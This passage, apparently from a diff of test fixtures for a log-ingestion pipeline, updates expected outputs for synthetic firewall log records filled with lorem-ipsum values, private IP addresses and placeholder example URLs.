srccountry=uepor content_switch_name=umSecti server_pool_name=eabil false_positive_mitigation=ibusB user_name=rporis monitor_status=etco http_refer=https://example.org/ereprehe/olu.html?liqu=ipsu#siarch http_version=itautfu dev_id=rrorsi threat_weight=ole history_threat_weight=odi threat_level=tper ftp_mode=olor ftp_cmd=corpo cipher_suite=commod msg_id=iumd", "event": { - "ingested": "2021-12-09T13:37:31.907077500Z" + "ingested": "2021-12-14T14:43:11.779410148Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"logver=aborisn dtime=2017-12-29 15:15:58.472538723 +0000 UTC devid=onproid devname=sitv vd=equam date=2017-12-29 time=3:15:58 logid=bor type=ameaquei subtype=aeca level=very-high eventtime=aperiam logtime=ngelit srcip=10.217.145.137 srcport=5242 srcintf=enp0s6940 srcintfrole=orema dstip=10.22.149.132 dstport=7725 dstintf=lo7156 dstintfrole=neavolup poluuid=lits sessionid=Nemoen proto=0 action=block policyid=rur policytype=quaturve crscore=166.007000 craction=oeiusmod crlevel=uidolore appcat=iacon service=ncu srccountry=quaturve dstcountry=ciad trandisp=diconseq tranip=10.251.183.113 tranport=2604 duration=161.433000 sentbyte=5697 rcvdbyte=7299 sentpkt=eseosqu app=uptatem", "event": { - "ingested": "2021-12-09T13:37:31.907082700Z" + "ingested": "2021-12-14T14:43:11.779410594Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=uamnihil devname=\"nisi\" devid=\"imadm\" vd=siutali date=2018-1-12 time=10:18:32 logid=mfugi type=ceroinBC subtype=lorumw level=low eventtime=squir logtime=commod srcip=10.183.16.252 srcport=3150 srcintf=lo6718 srcintfrole=eabillo dstip=10.203.66.175 dstport=3904 dstintf=enp0s3868 dstintfrole=dipisciv poluuid=nsequun sessionid=hen proto=icmp action=accept policyid=velillum policytype=itamet crscore=123.013000 craction=hil crlevel=itl appcat=idolo service=ncidid srccountry=oid dstcountry=iarchit trandisp=volupt tranip=10.51.60.203 tranport=5315 duration=165.955000 sentbyte=7551 rcvdbyte=1519 sentpkt=ten app=Utenim", "event": { - "ingested": "2021-12-09T13:37:31.907087900Z" + "ingested": "2021-12-14T14:43:11.779411178Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-1-27 time=5:21:06 logver=uasiarch devid=iamquisn devname=magnama logid=reprehe type=citatio subtype=dolo level=medium vd=esciunt srcip=10.133.245.26 srcport=1727 srcintf=enp0s2674 dstip=10.76.87.30 
dstport=2858 dstintf=enp0s2918 poluuid=remag sessionid=roinBCSe proto=HOPOPT action=accept policyid=labori trandisp=ditau duration=39.920000 sentbyte=5413 rcvdbyte=6650 devtype=tam osname=olu osversion=1.409 mastersrcmac=iut srcmac=01:00:5e:5c:c2:50 crscore=69.137000 craction=boris crlevel=ris eventtype=nisiuta user=utper service=uipexe hostname=ursint411.www.lan profile=gnamali reqtype=iumdo url=https://example.org/tem/iadeseru.jpg?olorsita=odoco#etc direction=internal msg=lamco method=natuser cat=Excepteu catdesc=omnis device_id=tati log_id=orinc pri=very-high userfrom=eturadi adminprof=cinge timezone=PT main_type=ira trigger_policy=niamq sub_type=quatD severity_level=nevol policy=lumquid src=10.157.14.165 src_port=7170 dst=10.61.200.105 dst_port=2813 http_method=tquov http_url=natu http_host=doei http_agent=acomm http_session_id=veleumi signature_subclass=volupt signature_id=6822 srccountry=itatise content_switch_name=ure server_pool_name=userro false_positive_mitigation=oree user_name=nimadmi monitor_status=utaliq http_refer=https://example.com/tinvolu/uredol.txt?did=lamcol#idolor http_version=tutlabor dev_id=nse threat_weight=rauto history_threat_weight=rese threat_level=nonproi ftp_mode=doconse ftp_cmd=henderi cipher_suite=tisunde msg_id=ende", "event": { - "ingested": "2021-12-09T13:37:31.907091800Z" + "ingested": "2021-12-14T14:43:11.779411650Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-2-10 time=12:23:41 logver=commod devid=oris devname=rcita logid=ataev type=oris subtype=incidi level=high vd=tutlabo srcip=10.32.66.161 srcport=881 srcintf=lo4523 dstip=10.134.238.8 dstport=2976 dstintf=enp0s1238 poluuid=edquiac sessionid=sit proto=HOPOPT action=allow policyid=olo trandisp=laboris duration=163.866000 sentbyte=7328 rcvdbyte=5375 devtype=tutl osname=nevolu osversion=1.5475 mastersrcmac=ostru srcmac=01:00:5e:e9:5f:84 crscore=157.516000 craction=aven 
crlevel=idolore eventtype=psaqu user=psa service=pta hostname=ididunt7607.mail.localhost profile=ntutlabo reqtype=leumiure url=https://mail.example.net/epteurs/usmodtem.gif?itvo=asi#tobe direction=internal msg=Lore method=oin cat=eritquii catdesc=taliqui device_id=ecatcu log_id=entoreve pri=high userfrom=umquam adminprof=onev timezone=CET main_type=tionev trigger_policy=ali sub_type=ionu severity_level=perna policy=moll src=10.242.178.15 src_port=3948 dst=10.217.111.77 dst_port=7309 http_method=datatno http_url=equepor http_host=antium http_agent=ugiatn http_session_id=utpe signature_subclass=hend signature_id=1170 srccountry=agnamali content_switch_name=ptateve server_pool_name=aliqua false_positive_mitigation=officiad user_name=nimadmin monitor_status=iavol http_refer=https://example.net/iumtota/qui.jpg?quel=ugitsed#ritatis http_version=olor dev_id=emoenim threat_weight=turadipi history_threat_weight=umSec threat_level=onsecte ftp_mode=inibusBo ftp_cmd=tqui cipher_suite=sequun msg_id=nimadm", "event": { - "ingested": "2021-12-09T13:37:31.907095800Z" + "ingested": "2021-12-14T14:43:11.779412048Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-2-24 time=7:26:15 logver=vitaedic devid=remip devname=rsita logid=rehe type=aper subtype=gnaa level=low vd=uta srcip=10.161.128.235 srcport=6280 srcintf=eth2121 dstip=10.84.29.117 dstport=1245 dstintf=eth7500 poluuid=errorsi sessionid=umwr proto=HOPOPT action=cancel policyid=cupida trandisp=rinc duration=5.709000 sentbyte=289 rcvdbyte=6059 devtype=dquia osname=ommod osversion=1.142 mastersrcmac=dico srcmac=01:00:5e:06:53:8a crscore=35.836000 craction=imipsa crlevel=iscinge eventtype=ora user=meumfug service=inimve hostname=mco2906.domain profile=sitvolu reqtype=eratv url=https://www.example.com/iadolo/cidu.txt?aliquide=redolori#eav direction=inbound msg=nse method=turQuis cat=tat catdesc=pta device_id=henderi log_id=onsec pri=high 
userfrom=itaspern adminprof=tau timezone=GMT+02:00 main_type=rsintoc trigger_policy=boreetd sub_type=rehende severity_level=sitamet policy=xerc src=10.199.119.251 src_port=7286 dst=10.86.152.227 dst_port=850 http_method=ant http_url=tiu http_host=ommodoco http_agent=rehe http_session_id=eseosqu signature_subclass=oeius signature_id=641 srccountry=eaqueip content_switch_name=laud server_pool_name=uido false_positive_mitigation=uis user_name=msequin monitor_status=autem http_refer=https://internal.example.org/ipi/qua.htm?itat=adipisc#omnisist http_version=orroqui dev_id=sci threat_weight=psamvolu history_threat_weight=itsedqui threat_level=oreve ftp_mode=omn ftp_cmd=onevol cipher_suite=ese msg_id=reprehen", "event": { - "ingested": "2021-12-09T13:37:31.907099800Z" + "ingested": "2021-12-14T14:43:11.779412616Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-3-11 time=2:28:49 logver=eumfugia devid=nimvenia devname=dol logid=rissusc type=lit subtype=quin level=low vd=eddoei srcip=10.35.73.208 srcport=7081 srcintf=eth6552 dstip=10.216.120.61 dstport=6389 dstintf=eth2068 poluuid=dolor sessionid=emUteni proto=tcp action=deny policyid=illoin trandisp=rinre duration=166.295000 sentbyte=5988 rcvdbyte=3374 devtype=olorem osname=mquae osversion=1.1789 mastersrcmac=rQuis srcmac=01:00:5e:b5:9a:3e crscore=5.250000 craction=enimadmi crlevel=elit eventtype=uia user=tem service=unt hostname=ntex5135.corp profile=mqua reqtype=equa url=https://internal.example.com/isc/umdol.jpg?atn=sectet#boreetd direction=outbound msg=olorin method=oluptat cat=olors catdesc=mSecti device_id=ius log_id=quian pri=low userfrom=urExce adminprof=upt timezone=PST main_type=pteurs trigger_policy=intocc sub_type=abo severity_level=orisnis policy=reseo src=10.239.194.105 src_port=3629 dst=10.234.171.117 dst_port=4488 http_method=tenatus http_url=odic http_host=ono http_agent=umtota http_session_id=consequ 
signature_subclass=ine signature_id=3409 srccountry=dex content_switch_name=ipis server_pool_name=nsecte false_positive_mitigation=miurere user_name=tat monitor_status=pitlabor http_refer=https://example.com/olupta/ape.jpg?mnisiut=eabil#olu http_version=uaUte dev_id=empor threat_weight=ate history_threat_weight=eca threat_level=inre ftp_mode=aliqu ftp_cmd=orem cipher_suite=dquian msg_id=isaute", "event": { - "ingested": "2021-12-09T13:37:31.907103300Z" + "ingested": "2021-12-14T14:43:11.779413055Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=emagnaal dtime=2018-03-25 09:31:24.032538723 +0000 UTC devid=uunturm devname=nonnumq vd=tqu date=2018-3-25 time=9:31:24 logid=ntocca type=emquelau subtype=adolorsi level=medium eventtime=maliquam logtime=ovol srcip=10.34.41.75 srcport=4436 srcintf=enp0s7638 srcintfrole=eseosqu dstip=10.249.16.201 dstport=4293 dstintf=lo5084 dstintfrole=mvele poluuid=qui sessionid=etMa proto=3 action=accept policyid=aspe policytype=uradipi crscore=22.220000 craction=atu crlevel=amremape appcat=illoinve service=uis srccountry=itanimi dstcountry=rinc trandisp=isistena tranip=10.107.168.208 tranport=1864 duration=45.477000 sentbyte=1067 rcvdbyte=2855 sentpkt=ctionofd app=uianonnu", "event": { - "ingested": "2021-12-09T13:37:31.907107700Z" + "ingested": "2021-12-14T14:43:11.779413472Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=nisiste date=2018-4-8 time=4:33:58 log_id=sedqu devid=itautfu devname=aaliq logid=tDui type=ernatur subtype=itsed level=low vd=xeacomm srcip=10.112.57.220 srcport=5803 srcintf=enp0s1897 dstip=10.19.151.236 dstport=884 dstintf=enp0s4144 poluuid=estiaeco sessionid=vele proto=HOPOPT action=allow policyid=yCiceroi trandisp=loremeu duration=156.263000 sentbyte=3719 rcvdbyte=7292 devtype=colab osname=itte osversion=1.6905 mastersrcmac=orumS 
srcmac=01:00:5e:c1:b8:93 crscore=60.950000 craction=uptat crlevel=incidun eventtype=agnaaliq user=aturQuis service=cepteurs hostname=tat1845.internal.invalid profile=rumetMal reqtype=tiumtot url=https://www.example.com/imadm/ugiat.txt?Nequepor=nisiu#ptat direction=inbound msg=eddoe method=seq cat=uae catdesc=tobeata device_id=ctas log_id=vol pri=high userfrom=gna adminprof=itautf timezone=ET main_type=eprehe trigger_policy=ariatu sub_type=aqueip severity_level=aqueip policy=rautod src=10.96.168.24 src_port=6206 dst=10.109.106.194 dst_port=5356 http_method=Sedut http_url=stiaec http_host=rveli http_agent=serr http_session_id=umdolo signature_subclass=iduntut signature_id=4281 srccountry=rorsitv content_switch_name=caboNemo server_pool_name=cididun false_positive_mitigation=iamqu user_name=ommodoc monitor_status=mwrit http_refer=https://www5.example.com/madminim/onse.txt?reeuf=orinrepr#tinvo http_version=oru dev_id=ainc threat_weight=aeab history_threat_weight=iat threat_level=acom ftp_mode=olo ftp_cmd=eipsaq cipher_suite=enatu msg_id=mfu", "event": { - "ingested": "2021-12-09T13:37:31.907113500Z" + "ingested": "2021-12-14T14:43:11.779413867Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=aliqui date=2018-4-22 time=11:36:32 log_id=uipexea devid=sauteiru devname=nibusB logid=eetdolo type=issuscip subtype=iduntu level=high vd=rinc srcip=10.109.224.208 srcport=1769 srcintf=enp0s3638 dstip=10.31.34.96 dstport=4651 dstintf=enp0s390 poluuid=atis sessionid=edol proto=icmp action=deny policyid=adip trandisp=ugiatq duration=128.795000 sentbyte=4249 rcvdbyte=6693 devtype=atemUte osname=emag osversion=1.1353 mastersrcmac=ecatcup srcmac=01:00:5e:63:85:d2 crscore=62.286000 craction=oin crlevel=isautem eventtype=eiusm user=assit service=ulpaq hostname=ulamc767.internal.lan profile=iades reqtype=mremape url=https://mail.example.net/ionemu/nul.jpg?volupt=ori#sed direction=inbound 
msg=maveniam method=ctobeat cat=emoenim catdesc=oqui device_id=olab log_id=remagnam pri=high userfrom=mSecti adminprof=volupt timezone=OMST main_type=ela trigger_policy=fugits sub_type=litseddo severity_level=idestl policy=ptasn src=10.112.155.228 src_port=5011 dst=10.47.191.95 dst_port=6242 http_method=velillu http_url=radipi http_host=iatn http_agent=aturE http_session_id=beat signature_subclass=pern signature_id=7568 srccountry=itvolupt content_switch_name=uradip server_pool_name=perspi false_positive_mitigation=uaer user_name=aed monitor_status=tectobe http_refer=https://example.org/scingeli/uatDuis.gif?apari=itesseci#utali http_version=ofdeFin dev_id=siutaliq threat_weight=urvel history_threat_weight=turE threat_level=ntium ftp_mode=imadmi ftp_cmd=dquiac cipher_suite=liquide msg_id=uatD", "event": { - "ingested": "2021-12-09T13:37:31.907119200Z" + "ingested": "2021-12-14T14:43:11.779414279Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=gnidolor dtime=2018-05-07 06:39:06.812538723 +0000 UTC devid=BCSedut devname=metco vd=vel date=2018-5-7 time=6:39:06 logid=tmol type=acommodi subtype=ccaecat level=low eventtime=mqu logtime=mips srcip=10.103.169.94 srcport=2174 srcintf=lo5821 srcintfrole=osqu dstip=10.140.137.17 dstport=446 dstintf=enp0s4444 dstintfrole=iono poluuid=atcupi sessionid=dexe proto=0 action=allow policyid=exerci policytype=ems crscore=15.728000 craction=nulapa crlevel=tess appcat=eroi service=enby srccountry=riatur dstcountry=amrema trandisp=illum tranip=10.62.241.218 tranport=7444 duration=5.969000 sentbyte=4832 rcvdbyte=6033 sentpkt=urere app=involu", "event": { - "ingested": "2021-12-09T13:37:31.907124900Z" + "ingested": "2021-12-14T14:43:11.779414727Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=tem devname=\"litsedq\" devid=\"amre\" vd=orpori 
date=2018-5-21 time=1:41:41 logid=sistena type=iam subtype=saquae level=low eventtime=itanimid logtime=ianonnum srcip=10.90.229.92 srcport=6796 srcintf=lo1752 srcintfrole=inculp dstip=10.251.212.166 dstport=3925 dstintf=eth1592 dstintfrole=aboNemo poluuid=tsedquia sessionid=ididun proto=21 action=cancel policyid=enim policytype=gnido crscore=85.453000 craction=erepr crlevel=tsedqu appcat=uisa service=uptat srccountry=siutal dstcountry=umetMalo trandisp=onevolu tranip=10.77.105.160 tranport=5541 duration=155.903000 sentbyte=5294 rcvdbyte=2687 sentpkt=ira app=umfu", "event": { - "ingested": "2021-12-09T13:37:31.907130500Z" + "ingested": "2021-12-14T14:43:11.779415261Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-6-4 time=8:44:15 logver=uamq devid=mnisist devname=dutp logid=ecillu type=ipsaqu subtype=asun level=very-high vd=llumd srcip=10.100.223.157 srcport=1307 srcintf=eth5742 dstip=10.232.243.87 dstport=4546 dstintf=lo299 poluuid=atisetq sessionid=mSectio proto=0 action=cancel policyid=nonnumqu trandisp=atis duration=63.050000 sentbyte=3508 rcvdbyte=205 devtype=uam osname=tisunde osversion=1.4261 mastersrcmac=rured srcmac=01:00:5e:8a:c1:2a crscore=19.243000 craction=meumfug crlevel=iam eventtype=animi user=porainc service=nsectetu hostname=spici5547.internal.test profile=tate reqtype=sintocca url=https://mail.example.org/asuntex/uovolup.html?amali=uiav#henderi direction=internal msg=tnul method=ons cat=radip catdesc=amremap device_id=dolorsit log_id=atisund pri=very-high userfrom=uredo adminprof=uamni timezone=CT main_type=quisqua trigger_policy=sedquian sub_type=lamcorpo severity_level=rem policy=apariat src=10.216.49.112 src_port=4521 dst=10.112.242.68 dst_port=3105 http_method=aut http_url=eriti http_host=ipsum http_agent=com http_session_id=uptate signature_subclass=tevelite signature_id=5880 srccountry=nimadmi content_switch_name=mquiado server_pool_name=agn 
false_positive_mitigation=dip user_name=urmag monitor_status=nim http_refer=https://www5.example.net/tutlabo/incid.gif?ptate=tconsect#usm http_version=uunturma dev_id=namaliqu threat_weight=tatemacc history_threat_weight=licab threat_level=roidents ftp_mode=volupta ftp_cmd=stiaeco cipher_suite=tanim msg_id=osam", "event": { - "ingested": "2021-12-09T13:37:31.907136200Z" + "ingested": "2021-12-14T14:43:11.779416324Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-6-19 time=3:46:49 logver=tla devid=nimve devname=edutpe logid=tenb type=billoinv subtype=asia level=medium vd=paquioff srcip=10.252.175.174 srcport=1995 srcintf=enp0s1531 dstip=10.196.226.219 dstport=545 dstintf=lo2390 poluuid=uaera sessionid=nsequa proto=tcp action=accept policyid=orporis trandisp=oluptate duration=28.731000 sentbyte=2397 rcvdbyte=1768 devtype=itvolu osname=citation osversion=1.491 mastersrcmac=aincid srcmac=01:00:5e:7e:ea:3f crscore=149.960000 craction=tNeque crlevel=uidolore eventtype=uatDuisa user=usB service=magnaali hostname=istenatu3686.invalid profile=remagna reqtype=eritqu url=https://example.org/mnisiut/porinci.htm?norum=emUten#dminimve direction=internal msg=oremagna method=nulamc cat=tempori catdesc=rsintocc device_id=nderit log_id=etco pri=very-high userfrom=lore adminprof=ameiusmo timezone=PT main_type=veniamqu trigger_policy=equat sub_type=reeu severity_level=atemacc policy=rsitvolu src=10.182.58.108 src_port=4811 dst=10.96.100.84 dst_port=2253 http_method=utlabore http_url=texplica http_host=boru http_agent=ntut http_session_id=elaud signature_subclass=acomm signature_id=5667 srccountry=emUten content_switch_name=uamni server_pool_name=laboris false_positive_mitigation=pers user_name=lpaquiof monitor_status=isisten http_refer=https://api.example.net/seddoei/rnatur.jpg?olores=idolorem#umdolors http_version=uid dev_id=numqua threat_weight=citatio history_threat_weight=sed 
threat_level=mUten ftp_mode=eursint ftp_cmd=velillum cipher_suite=oin msg_id=teurs", "event": { - "ingested": "2021-12-09T13:37:31.907141800Z" + "ingested": "2021-12-14T14:43:11.779417178Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=untutl devname=\"cons\" devid=\"vel\" vd=illumdo date=2018-7-3 time=10:49:23 logid=rios type=deF subtype=dutpe level=very-high eventtime=itan logtime=uisnos srcip=10.228.61.5 srcport=1179 srcintf=eth4741 srcintfrole=lites dstip=10.246.41.77 dstport=1217 dstintf=lo7502 dstintfrole=olu poluuid=ectet sessionid=tquovo proto=17 action=block policyid=lapa policytype=xeacom crscore=22.822000 craction=qui crlevel=henderi appcat=rainc service=dminim srccountry=sse dstcountry=tatem trandisp=umexe tranip=10.157.22.21 tranport=5252 duration=135.630000 sentbyte=2167 rcvdbyte=2952 sentpkt=quamei app=nvento", "event": { - "ingested": "2021-12-09T13:37:31.907147500Z" + "ingested": "2021-12-14T14:43:11.779417971Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=qua devname=\"llumdo\" devid=\"tot\" vd=itquii date=2018-7-17 time=5:51:58 logid=psu type=iat subtype=ept level=high eventtime=ectob logtime=aUtenim srcip=10.242.119.111 srcport=645 srcintf=lo1640 srcintfrole=tDuisa dstip=10.239.231.168 dstport=88 dstintf=lo3385 dstintfrole=nimi poluuid=niamqu sessionid=uioffi proto=1 action=allow policyid=consequa policytype=tionu crscore=60.452000 craction=quines crlevel=entsu appcat=ineavol service=abor srccountry=giatq dstcountry=nonpro trandisp=elitsedd tranip=10.188.131.18 tranport=981 duration=46.954000 sentbyte=2770 rcvdbyte=4226 sentpkt=tam app=uovo", "event": { - "ingested": "2021-12-09T13:37:31.907153300Z" + "ingested": "2021-12-14T14:43:11.779418614Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": 
"1.12.0" - }, "message": "logver=orinrepr date=2018-8-1 time=12:54:32 log_id=untut devid=siu devname=lorem logid=icons type=hende subtype=umdol level=medium vd=psaq srcip=10.24.154.250 srcport=2108 srcintf=eth2707 dstip=10.124.187.230 dstport=6119 dstintf=lo105 poluuid=mqu sessionid=tse proto=udp action=accept policyid=ueip trandisp=amvo duration=20.956000 sentbyte=2068 rcvdbyte=306 devtype=reetdolo osname=tten osversion=1.979 mastersrcmac=usa srcmac=01:00:5e:6a:a6:c9 crscore=45.307000 craction=oremagna crlevel=siuta eventtype=amnihil user=nderit service=ficia hostname=tru3812.mail.lan profile=olo reqtype=xer url=https://api.example.net/nsec/smo.gif?etq=trumexe#rai direction=outbound msg=tNequepo method=byCicer cat=imvenia catdesc=ipit device_id=tdolorem log_id=nderitin pri=low userfrom=enderitq adminprof=amvolu timezone=GMT-07:00 main_type=temvele trigger_policy=ofd sub_type=quam severity_level=umdol policy=porincid src=10.106.101.87 src_port=7569 dst=10.247.124.74 dst_port=2491 http_method=inea http_url=ipsu http_host=iden http_agent=oreseo http_session_id=edictasu signature_subclass=aerat signature_id=4358 srccountry=lites content_switch_name=col server_pool_name=litsedd false_positive_mitigation=mnis user_name=ainci monitor_status=aturve http_refer=https://api.example.com/mporain/secte.txt?amqui=rume#uptate http_version=tisundeo dev_id=uid threat_weight=eFini history_threat_weight=mnis threat_level=tametco ftp_mode=snisiut ftp_cmd=lit cipher_suite=laborio msg_id=aaliqu", "event": { - "ingested": "2021-12-09T13:37:31.907159Z" + "ingested": "2021-12-14T14:43:11.779419478Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-8-15 time=7:57:06 devname=mid device_id=henderi log_id=consec type=event subtype=dquia pri=high desc=isiutali user=rehe userfrom=volupta msg=etcons action=deny adom=etdol408.internal.home session_id=agnamali", "event": { - "ingested": 
"2021-12-09T13:37:31.907181100Z" + "ingested": "2021-12-14T14:43:11.779422124Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-8-29 time=2:59:40 logver=cae devid=Utenimad devname=onsequ logid=Bon type=amquisno subtype=mullam level=very-high vd=admi srcip=10.111.106.60 srcport=5449 srcintf=lo5820 dstip=10.142.181.192 dstport=4386 dstintf=lo6200 poluuid=lmolest sessionid=miurerep proto=17 action=allow policyid=Sed trandisp=isau duration=66.574000 sentbyte=75 rcvdbyte=806 devtype=idest osname=ostru osversion=1.4342 mastersrcmac=enimip srcmac=01:00:5e:11:d6:5d crscore=66.141000 craction=umquiado crlevel=taspe eventtype=empori user=mipsum service=tium hostname=riaturE1644.www5.example profile=ender reqtype=uine url=https://internal.example.com/dolo/exeacom.txt?tlab=eufugiat#upta direction=internal msg=reetdo method=mad cat=mdolor catdesc=amcorpor device_id=oremquel log_id=san pri=high userfrom=amqui adminprof=itatise timezone=GMT-07:00 main_type=cia trigger_policy=lup sub_type=cipitla severity_level=niam policy=mullamc src=10.215.144.167 src_port=6675 dst=10.162.114.52 dst_port=2925 http_method=quepor http_url=Lor http_host=ten http_agent=exeacomm http_session_id=cusan signature_subclass=oquisq signature_id=4993 srccountry=ihilmol content_switch_name=seosqui server_pool_name=tiset false_positive_mitigation=ciade user_name=erspici monitor_status=xercitat http_refer=https://internal.example.net/utlab/entoreve.html?umdol=nseq#autodita http_version=loreme dev_id=eratv threat_weight=tametcon history_threat_weight=orsi threat_level=ull ftp_mode=mcor ftp_cmd=iamquis cipher_suite=aeabi msg_id=ore", "event": { - "ingested": "2021-12-09T13:37:31.907186800Z" + "ingested": "2021-12-14T14:43:11.779423042Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-9-12 time=10:02:15 logver=catcup 
devid=ectetur devname=cons logid=spiciati type=upidata subtype=utlabo level=high vd=ersp srcip=10.101.207.156 srcport=2086 srcintf=enp0s4931 dstip=10.12.8.82 dstport=4369 dstintf=enp0s7520 poluuid=nemull sessionid=trumex proto=6 action=accept policyid=doloremq trandisp=iade duration=26.420000 sentbyte=5013 rcvdbyte=7641 devtype=uidolo osname=ita osversion=1.6452 mastersrcmac=rchite srcmac=01:00:5e:41:90:bf crscore=107.693000 craction=tionem crlevel=volupta eventtype=adol user=econsequ service=orever hostname=mdolo7008.api.corp profile=reetdolo reqtype=psam url=https://www5.example.org/orumet/aliqu.txt?tion=sun#utod direction=outbound msg=rinci method=uamestqu cat=riatu catdesc=ulaparia device_id=remagna log_id=fugi pri=very-high userfrom=xerc adminprof=caecat timezone=OMST main_type=cor trigger_policy=nonnumqu sub_type=uidexea severity_level=emu policy=asia src=10.162.128.87 src_port=6214 dst=10.78.75.82 dst_port=7799 http_method=uptat http_url=con http_host=tem http_agent=orpori http_session_id=lor signature_subclass=quiinea signature_id=7098 srccountry=rroquis content_switch_name=dolorema server_pool_name=prehe false_positive_mitigation=bori user_name=Sedutp monitor_status=ritinvo http_refer=https://internal.example.net/ica/nat.jpg?ddoe=nsequ#lloinve http_version=tdolo dev_id=billoi threat_weight=sequu history_threat_weight=ffic threat_level=imadmini ftp_mode=isnostru ftp_cmd=ostr cipher_suite=tinvo msg_id=lorumwr", "event": { - "ingested": "2021-12-09T13:37:31.907192400Z" + "ingested": "2021-12-14T14:43:11.779423724Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ctetura devname=\"reseosqu\" devid=\"ittenbyC\" vd=tlabor date=2018-9-27 time=5:04:49 logid=auteir type=uredolo subtype=uido level=medium eventtime=quiratio logtime=aincidu srcip=10.75.198.93 srcport=1982 srcintf=eth725 srcintfrole=umqu dstip=10.137.36.151 dstport=196 dstintf=lo1813 dstintfrole=rspici 
poluuid=duntutla sessionid=emeu proto=1 action=block policyid=atemUten policytype=turadipi crscore=16.226000 craction=estqu crlevel=orinre appcat=prehen service=equa srccountry=ciatisun dstcountry=mdolorem trandisp=nnumq tranip=10.51.106.43 tranport=6486 duration=78.551000 sentbyte=3531 rcvdbyte=5464 sentpkt=oremeumf app=volupt", "event": { - "ingested": "2021-12-09T13:37:31.907198200Z" + "ingested": "2021-12-14T14:43:11.779424407Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=tnulapa devname=\"caecatcu\" devid=\"xcepte\" vd=deserun date=2018-10-11 time=12:07:23 logid=mvol type=erep subtype=teurs level=low eventtime=tiumdol logtime=byCicer srcip=10.154.151.111 srcport=5860 srcintf=eth1273 srcintfrole=uisnos dstip=10.7.230.206 dstport=5757 dstintf=lo1291 dstintfrole=pisc poluuid=eumfu sessionid=tseddoe proto=HOPOPT action=allow policyid=emulla policytype=bill crscore=147.522000 craction=oditaut crlevel=oloremqu appcat=untNeque service=reetdol srccountry=perspi dstcountry=tlab trandisp=udexerci tranip=10.249.93.150 tranport=799 duration=113.020000 sentbyte=2808 rcvdbyte=5744 sentpkt=ovolup app=squ", "event": { - "ingested": "2021-12-09T13:37:31.907206800Z" + "ingested": "2021-12-14T14:43:11.779425100Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-10-25 time=7:09:57 logver=dolor devid=lit devname=ptatem logid=oeiusmod type=ugi subtype=utaliq level=very-high vd=toc srcip=10.76.177.154 srcport=1428 srcintf=eth4425 dstip=10.207.160.170 dstport=7037 dstintf=lo1570 poluuid=reseo sessionid=iration proto=tcp action=deny policyid=magn trandisp=iaecon duration=54.100000 sentbyte=622 rcvdbyte=6280 devtype=ill osname=oris osversion=1.5718 mastersrcmac=ulamcol srcmac=01:00:5e:19:ce:4b crscore=142.771000 craction=oNe crlevel=utfu eventtype=santiumd user=cididunt service=ctasu 
hostname=itse5466.api.example profile=ica reqtype=mnisis url=https://internal.example.com/nonnumqu/isciveli.gif?wri=aute#iscin direction=outbound msg=uat method=itasper cat=nibusBo catdesc=volupta device_id=olorinr log_id=iameaq pri=high userfrom=docons adminprof=uun timezone=OMST main_type=mremap trigger_policy=ate sub_type=agnaal severity_level=ibusB policy=mexe src=10.217.209.221 src_port=3639 dst=10.26.4.3 dst_port=5291 http_method=rsitame http_url=eca http_host=quirat http_agent=urmagn http_session_id=essec signature_subclass=prehende signature_id=1261 srccountry=setquas content_switch_name=nti server_pool_name=osamnis false_positive_mitigation=atisetqu user_name=ciduntut monitor_status=atisu http_refer=https://internal.example.com/architec/incul.txt?aborios=mco#amnisiu http_version=suntincu dev_id=lore threat_weight=equatu history_threat_weight=enbyCi threat_level=dolo ftp_mode=adipi ftp_cmd=beata cipher_suite=evelites msg_id=ipiscive", "event": { - "ingested": 